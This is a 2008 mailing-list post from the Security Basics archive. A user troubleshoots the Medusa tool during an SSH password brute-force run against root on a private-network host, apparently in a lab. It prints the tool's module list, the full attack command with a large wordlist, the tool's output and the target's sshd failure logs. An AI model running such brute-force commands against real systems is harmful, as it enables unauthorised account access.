Security Basics mailing list archives
attack ssh with medusa
From: Sergio Ruiz <sruiz () experienceis com>
Date: Thu, 21 Aug 2008 08:59:59 +0200
Hi, I have medusa to distribution ubuntu 7.10. $ medusa -V Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net> with ssh.mod activated: $ medusa -q Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net> Available modules in "." : Available modules in "/usr/local/lib/medusa/modules" : + cvs.mod : Brute force module for CVS sessions : version 1.0.0 + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0 + http.mod : Brute force module for HTTP : version 1.3.0 + imap.mod : Brute force module for IMAP sessions : version 1.1.0 + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1 + mysql.mod : Brute force module for MySQL sessions : version 1.2 + nntp.mod : Brute force module for NNTP sessions : version 0.9 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2 + pop3.mod : Brute force module for POP3 sessions : version 1.1.1 + rexec.mod : Brute force module for REXEC sessions : version 1.1.1 + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2 + rsh.mod : Brute force module for RSH sessions : version 1.0.1 + smbnt.mod : Brute force module for SMB/NTLMv1 sessions : version 1.3.1 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 0.9.1 + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0 + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2 + telnet.mod : Brute force module for telnet sessions : version 1.2.1 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.0 + vnc.mod : Brute force module for VNC sessions : version 1.0.1 + wrapper.mod : Generic Wrapper Module : version 1.0.1 when I start attack, I have a problem: $ medusa -h 192.168.1.2 -u root -P /home/sergi/John_Passw/D8.DIC -M ssh Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk () foofus net> ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: - (1/106626) ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: . (2/106626) ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,m (3/106626) ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,mn (4/106626) ERROR: Failed to retrieve supported authentication modes. Aborting... ERROR: No supported authentication methods located. ACCOUNT CHECK: [ssh] Host: 192.168.1.2 (1/1) User: root (1/1) Password: .,mnb (5/106626) $ in the victim pc: Aug 21 08:27:41 192.168.1.2 sshd[12649]: Failed password for root from 192.168.1.3 port 45652 ssh2 Aug 21 08:27:48 192.168.1.2 last message repeated 3 times which the problem? Thanks..
Current thread:
- attack ssh with medusa Sergio Ruiz (Aug 21)
- Re: attack ssh with medusa Adam hostetler (Aug 22)
- RE: attack ssh with medusa Veal, Richard (Aug 22)
- Re: attack ssh with medusa Sergio Ruiz (Aug 25)
